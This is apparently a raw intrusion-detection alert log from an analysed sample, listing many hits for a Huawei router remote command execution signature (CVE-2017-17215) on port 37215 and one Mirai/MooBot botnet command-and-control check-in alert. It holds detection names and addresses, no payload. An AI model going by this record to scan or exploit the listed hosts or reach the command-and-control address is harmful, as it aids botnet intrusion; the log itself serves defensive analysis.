                                                    07/10/24-08:26:15.812623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5587637215192.168.2.1441.56.73.162
                                                    07/10/24-08:27:07.369832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4079437215192.168.2.14191.251.100.215
                                                    07/10/24-08:27:24.953647TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5320237215192.168.2.14152.219.159.237
                                                    07/10/24-08:26:14.732568TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5644237215192.168.2.1441.2.94.99
                                                    07/10/24-08:26:49.868022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4279237215192.168.2.14157.118.157.58
                                                    07/10/24-08:26:15.871389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3808837215192.168.2.1490.64.172.84
                                                    07/10/24-08:27:33.802281TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4933237215192.168.2.14197.108.215.105
                                                    07/10/24-08:26:57.580617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3844837215192.168.2.1441.91.1.59
                                                    07/10/24-08:26:14.828942TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5485637215192.168.2.14197.166.3.210
                                                    07/10/24-08:27:31.454702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5083037215192.168.2.1457.61.2.248
                                                    07/10/24-08:26:28.777309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5478637215192.168.2.14197.13.2.33
                                                    07/10/24-08:26:36.420785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3926837215192.168.2.1441.207.23.241
                                                    07/10/24-08:26:48.021339TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3454437215192.168.2.14197.163.227.246
                                                    07/10/24-08:26:55.423552TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4706437215192.168.2.1487.111.215.174
                                                    07/10/24-08:26:43.757407TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6065237215192.168.2.1441.200.217.213
                                                    07/10/24-08:27:13.879681TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3463437215192.168.2.1461.117.202.215
                                                    07/10/24-08:27:23.817367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4386637215192.168.2.14205.7.70.97
                                                    07/10/24-08:27:13.971781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6058237215192.168.2.1417.94.242.6
                                                    07/10/24-08:27:13.973446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5155237215192.168.2.14157.17.42.221
                                                    07/10/24-08:26:59.828075TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3679437215192.168.2.14134.105.160.78
                                                    07/10/24-08:26:28.906271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4895637215192.168.2.14191.35.149.90
                                                    07/10/24-08:27:33.744023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5732837215192.168.2.14157.85.10.52
                                                    07/10/24-08:26:23.273552TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3876437215192.168.2.1497.252.2.231
                                                    07/10/24-08:27:14.827269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5648837215192.168.2.14194.25.240.185
                                                    07/10/24-08:27:19.160645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5564837215192.168.2.14197.142.209.196
                                                    07/10/24-08:27:23.921577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5086637215192.168.2.14129.164.70.85
                                                    07/10/24-08:26:47.860758TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3777437215192.168.2.1452.224.33.132
                                                    07/10/24-08:26:59.643122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3969637215192.168.2.14157.230.186.103
                                                    07/10/24-08:26:43.849597TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3681837215192.168.2.14197.29.253.94
                                                    07/10/24-08:26:34.180915TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3573637215192.168.2.1467.241.73.101
                                                    07/10/24-08:27:32.526946TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3563837215192.168.2.1441.20.136.45
                                                    07/10/24-08:26:18.015833TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5607037215192.168.2.14197.151.228.196
                                                    07/10/24-08:26:41.578531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5425037215192.168.2.1441.193.217.183
                                                    07/10/24-08:27:19.308441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3318837215192.168.2.1441.63.242.247
                                                    07/10/24-08:27:23.944387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4804637215192.168.2.14192.212.38.93
                                                    07/10/24-08:27:20.431094TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3757037215192.168.2.14216.127.38.60
                                                    07/10/24-08:26:55.278006TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5305437215192.168.2.14157.113.231.103
                                                    07/10/24-08:26:47.746309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4969237215192.168.2.14157.180.148.46
                                                    07/10/24-08:26:55.277913TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3654837215192.168.2.14201.105.21.202
                                                    07/10/24-08:26:41.446486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4759837215192.168.2.1441.183.98.235
                                                    07/10/24-08:27:10.547340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4183637215192.168.2.14158.126.16.58
                                                    07/10/24-08:26:15.842184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5198637215192.168.2.1441.88.252.6
                                                    07/10/24-08:27:17.067488TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4348837215192.168.2.14171.240.199.11
                                                    07/10/24-08:26:36.375708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6087837215192.168.2.14108.225.153.70
                                                    07/10/24-08:26:33.183618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5675837215192.168.2.14157.179.249.184
                                                    07/10/24-08:26:43.650681TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3524637215192.168.2.14197.98.209.214
                                                    07/10/24-08:27:10.767328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5627837215192.168.2.14197.12.181.48
                                                    07/10/24-08:27:33.719591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5996837215192.168.2.1449.242.117.155
                                                    07/10/24-08:26:42.373871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4507837215192.168.2.14197.8.222.95
                                                    07/10/24-08:27:07.374713TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4764437215192.168.2.14157.201.85.124
                                                    07/10/24-08:26:34.231574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5758237215192.168.2.14118.201.205.229
                                                    07/10/24-08:26:13.835893TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5710837215192.168.2.14150.129.41.142
                                                    07/10/24-08:26:42.356515TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5239637215192.168.2.14157.109.67.237
                                                    07/10/24-08:26:41.500844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5693437215192.168.2.141.112.78.57
                                                    07/10/24-08:27:22.853390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5058637215192.168.2.14197.31.221.105
                                                    07/10/24-08:26:57.677011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3860437215192.168.2.1441.219.225.171
                                                    07/10/24-08:27:17.102138TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5461037215192.168.2.14157.151.183.98
                                                    07/10/24-08:27:30.426359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5280437215192.168.2.14157.153.184.104
                                                    07/10/24-08:27:20.428275TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3492037215192.168.2.14171.150.224.159
                                                    07/10/24-08:26:41.514875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4564237215192.168.2.1441.160.202.67
                                                    07/10/24-08:27:28.100122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4470637215192.168.2.1441.224.139.37
                                                    07/10/24-08:26:14.796120TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4048837215192.168.2.14157.176.117.196
                                                    07/10/24-08:26:25.432344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3478237215192.168.2.14197.173.45.149
                                                    07/10/24-08:26:26.573504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3886837215192.168.2.1441.79.184.5
                                                    07/10/24-08:27:27.085141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4850037215192.168.2.14169.174.205.249
                                                    07/10/24-08:26:26.563035TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3892037215192.168.2.14197.253.178.146
                                                    07/10/24-08:26:42.345692TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3362037215192.168.2.14197.8.226.12
                                                    07/10/24-08:26:22.211996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5895237215192.168.2.14197.20.254.100
                                                    07/10/24-08:26:38.579889TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4055837215192.168.2.1459.1.70.62
                                                    07/10/24-08:26:23.293850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5307037215192.168.2.1483.141.137.136
                                                    07/10/24-08:26:33.221493TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3728437215192.168.2.141.0.171.77
                                                    07/10/24-08:26:29.875451TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4152237215192.168.2.1441.119.51.152
                                                    07/10/24-08:27:05.228923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5626637215192.168.2.14197.48.65.22
                                                    07/10/24-08:27:11.501102TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5124837215192.168.2.14197.230.27.96
                                                    07/10/24-08:26:53.129379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4351037215192.168.2.1486.38.110.191
                                                    07/10/24-08:26:47.995601TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5125437215192.168.2.14197.31.175.230
                                                    07/10/24-08:26:28.789449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3850237215192.168.2.14157.233.33.39
                                                    07/10/24-08:27:32.603772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3564437215192.168.2.1435.65.209.182
                                                    07/10/24-08:26:20.167079TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4272837215192.168.2.1481.197.57.97
                                                    07/10/24-08:26:25.464984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5981437215192.168.2.1441.255.111.58
                                                    07/10/24-08:27:30.560265TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4403837215192.168.2.1441.127.35.143
                                                    07/10/24-08:26:23.341408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4327837215192.168.2.1434.71.9.104
                                                    07/10/24-08:27:33.758146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3976237215192.168.2.1441.149.59.134
                                                    07/10/24-08:26:43.656959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4549637215192.168.2.1499.65.62.85
                                                    07/10/24-08:26:28.756462TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4668637215192.168.2.14157.115.144.209
                                                    07/10/24-08:26:36.388728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6037837215192.168.2.14212.248.94.180
                                                    07/10/24-08:26:57.670364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5765637215192.168.2.14197.146.109.170
                                                    07/10/24-08:27:07.325434TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3713437215192.168.2.1441.72.178.144
                                                    07/10/24-08:27:23.899186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5329637215192.168.2.14197.45.57.159
                                                    07/10/24-08:26:48.009015TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3787237215192.168.2.14157.10.190.138
                                                    07/10/24-08:26:49.817935TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5113037215192.168.2.14197.236.130.54
                                                    07/10/24-08:26:49.866134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5024437215192.168.2.1441.68.140.78
                                                    07/10/24-08:27:22.856924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3405037215192.168.2.14197.222.107.171
                                                    07/10/24-08:26:11.522836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4778637215192.168.2.14157.242.244.136
                                                    07/10/24-08:26:25.481164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4738437215192.168.2.1441.111.252.236
                                                    07/10/24-08:26:55.297607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3734637215192.168.2.1441.245.162.57
                                                    07/10/24-08:26:57.566526TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5988237215192.168.2.14197.149.39.90
                                                    07/10/24-08:26:41.606068TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4679237215192.168.2.14157.11.183.228
                                                    07/10/24-08:26:43.651509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5626437215192.168.2.1441.97.109.169
                                                    07/10/24-08:26:47.739348TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5417437215192.168.2.14197.147.119.152
                                                    07/10/24-08:27:23.494634TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6079837215192.168.2.14157.218.79.6
                                                    07/10/24-08:26:55.447518TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3719837215192.168.2.14116.206.248.120
                                                    07/10/24-08:27:05.238530TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3769837215192.168.2.14157.203.138.216
                                                    07/10/24-08:26:25.515269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4613637215192.168.2.14197.90.6.208
                                                    07/10/24-08:26:59.793542TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6044237215192.168.2.14163.30.173.88
                                                    07/10/24-08:27:14.834981TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4269037215192.168.2.14222.122.172.222
                                                    07/10/24-08:26:34.228514TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4528037215192.168.2.1485.143.27.11
                                                    07/10/24-08:27:33.823408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5861837215192.168.2.14197.175.130.22
                                                    07/10/24-08:27:34.122739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5618037215192.168.2.14212.177.246.207
                                                    07/10/24-08:26:33.244914TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4812437215192.168.2.14157.143.71.109
                                                    07/10/24-08:26:43.923272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5375837215192.168.2.14157.102.45.244
                                                    07/10/24-08:26:55.450781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3964237215192.168.2.1441.212.81.99
                                                    07/10/24-08:26:36.360121TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5122637215192.168.2.1441.162.134.206
                                                    07/10/24-08:26:52.062166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5214237215192.168.2.1448.2.41.112
                                                    07/10/24-08:27:08.325316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4586637215192.168.2.1441.170.39.30
                                                    07/10/24-08:26:26.435270TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3399637215192.168.2.1460.228.126.83
                                                    07/10/24-08:26:42.374424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4925637215192.168.2.14197.231.215.99
                                                    07/10/24-08:26:36.357505TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6014037215192.168.2.14157.150.81.54
                                                    07/10/24-08:26:45.631888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4469037215192.168.2.14101.167.134.163
                                                    07/10/24-08:27:27.121135TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3704037215192.168.2.1441.239.250.252
                                                    07/10/24-08:27:10.767328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4667037215192.168.2.1441.203.172.151
                                                    07/10/24-08:26:48.023936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5844237215192.168.2.1441.89.243.217
                                                    07/10/24-08:26:48.031000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3670637215192.168.2.1470.88.202.47
                                                    07/10/24-08:26:15.835442TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3549237215192.168.2.1441.21.65.30
                                                    07/10/24-08:26:52.054168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4400037215192.168.2.14157.22.189.188
                                                    07/10/24-08:26:28.743244TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3882637215192.168.2.14157.134.237.46
                                                    07/10/24-08:27:30.500582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5024037215192.168.2.1420.36.203.128
                                                    07/10/24-08:26:55.364667TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4755237215192.168.2.14157.39.203.91
                                                    07/10/24-08:27:02.702208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5392437215192.168.2.14197.250.186.22
                                                    07/10/24-08:26:31.083284TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4788437215192.168.2.14157.203.192.54
                                                    07/10/24-08:26:15.793642TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5893037215192.168.2.1441.147.45.84
                                                    07/10/24-08:27:02.860039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4254437215192.168.2.1441.105.37.10
                                                    07/10/24-08:27:08.398717TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4745437215192.168.2.1441.133.202.58
                                                    07/10/24-08:27:22.872449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4553837215192.168.2.14199.113.233.161
                                                    07/10/24-08:27:31.565038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5032037215192.168.2.14157.77.71.173
                                                    07/10/24-08:27:30.419826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4370037215192.168.2.14197.182.12.196
                                                    07/10/24-08:26:11.434490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3849637215192.168.2.14157.5.249.164
                                                    07/10/24-08:26:23.355415TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4766037215192.168.2.14163.91.121.228
                                                    07/10/24-08:27:16.994727TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5327837215192.168.2.14157.68.194.127
                                                    07/10/24-08:27:30.562651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3553637215192.168.2.1441.105.127.67
                                                    07/10/24-08:26:20.091176TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4731637215192.168.2.1441.27.29.184
                                                    07/10/24-08:26:25.451839TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5752637215192.168.2.14217.125.151.243
                                                    07/10/24-08:26:29.785606TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3853837215192.168.2.1441.91.210.99
                                                    07/10/24-08:26:36.333878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5330037215192.168.2.14157.149.247.12
                                                    07/10/24-08:26:14.827128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5778037215192.168.2.1441.197.23.71
                                                    07/10/24-08:27:24.887836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5977437215192.168.2.1441.15.53.242
                                                    07/10/24-08:26:17.996643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3359237215192.168.2.14157.85.11.225
                                                    07/10/24-08:27:30.547260TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3985637215192.168.2.14197.109.110.150
                                                    07/10/24-08:27:02.957344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3806637215192.168.2.1441.78.24.105
                                                    07/10/24-08:26:36.436089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4962037215192.168.2.1454.218.150.225
                                                    07/10/24-08:27:28.126116TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3292037215192.168.2.14157.177.142.172
                                                    07/10/24-08:26:26.524985TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3366037215192.168.2.14157.164.197.63
                                                    07/10/24-08:26:28.907657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4580437215192.168.2.14197.240.33.149
                                                    07/10/24-08:26:47.891770TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3606037215192.168.2.14197.42.129.210
                                                    07/10/24-08:26:51.988917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5848637215192.168.2.1441.177.24.4
                                                    07/10/24-08:27:32.603771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5122837215192.168.2.14104.92.86.123
                                                    07/10/24-08:27:23.893533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5199437215192.168.2.1439.96.102.143
                                                    07/10/24-08:26:42.380057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5474637215192.168.2.14115.16.76.21
                                                    07/10/24-08:27:13.892094TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5044437215192.168.2.1441.34.196.252
                                                    07/10/24-08:26:28.854887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5181437215192.168.2.14117.176.127.237
                                                    07/10/24-08:26:51.945867TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4869437215192.168.2.1452.41.77.14
                                                    07/10/24-08:27:07.379672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4538637215192.168.2.14197.178.8.79
                                                    07/10/24-08:26:53.210385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3993237215192.168.2.1441.186.115.131
                                                    07/10/24-08:26:33.257130TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3433437215192.168.2.1441.102.177.176
                                                    07/10/24-08:27:03.019463TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5527437215192.168.2.1441.169.81.136
                                                    07/10/24-08:26:51.960962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5259437215192.168.2.1441.14.245.184
                                                    07/10/24-08:26:31.099598TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5888237215192.168.2.1441.238.163.186
                                                    07/10/24-08:26:17.952819TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4068437215192.168.2.1441.27.208.217
                                                    07/10/24-08:27:05.134098TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5265037215192.168.2.14157.38.242.104
                                                    07/10/24-08:26:41.529944TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5980037215192.168.2.14152.154.249.67
                                                    07/10/24-08:27:03.946735TCP2030490ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)586985976192.168.2.1451.79.141.54
                                                    07/10/24-08:26:22.295536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5726237215192.168.2.14157.9.54.55
                                                    07/10/24-08:27:31.453748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3473037215192.168.2.1441.61.36.161
                                                    07/10/24-08:26:33.228280TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5467637215192.168.2.14162.32.70.209
                                                    07/10/24-08:26:55.457969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4347037215192.168.2.14197.237.41.11
                                                    07/10/24-08:27:24.959709TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4575837215192.168.2.14157.72.84.24
                                                    07/10/24-08:26:28.856505TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5168637215192.168.2.14197.203.130.0
                                                    07/10/24-08:26:33.183618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5824237215192.168.2.1432.97.111.143
                                                    07/10/24-08:26:41.549271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5379637215192.168.2.14157.36.183.43
                                                    07/10/24-08:26:42.422786TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3298837215192.168.2.14197.47.73.127
                                                    07/10/24-08:27:27.151172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3821837215192.168.2.14157.147.50.215
                                                    07/10/24-08:26:14.781541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3577037215192.168.2.14157.39.160.36
                                                    07/10/24-08:26:28.639022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6036237215192.168.2.1441.63.211.56
                                                    07/10/24-08:26:17.985444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5617637215192.168.2.14157.73.138.40
                                                    07/10/24-08:27:16.996210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5131237215192.168.2.14157.111.140.20
                                                    07/10/24-08:26:43.763647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5365637215192.168.2.14157.158.114.234
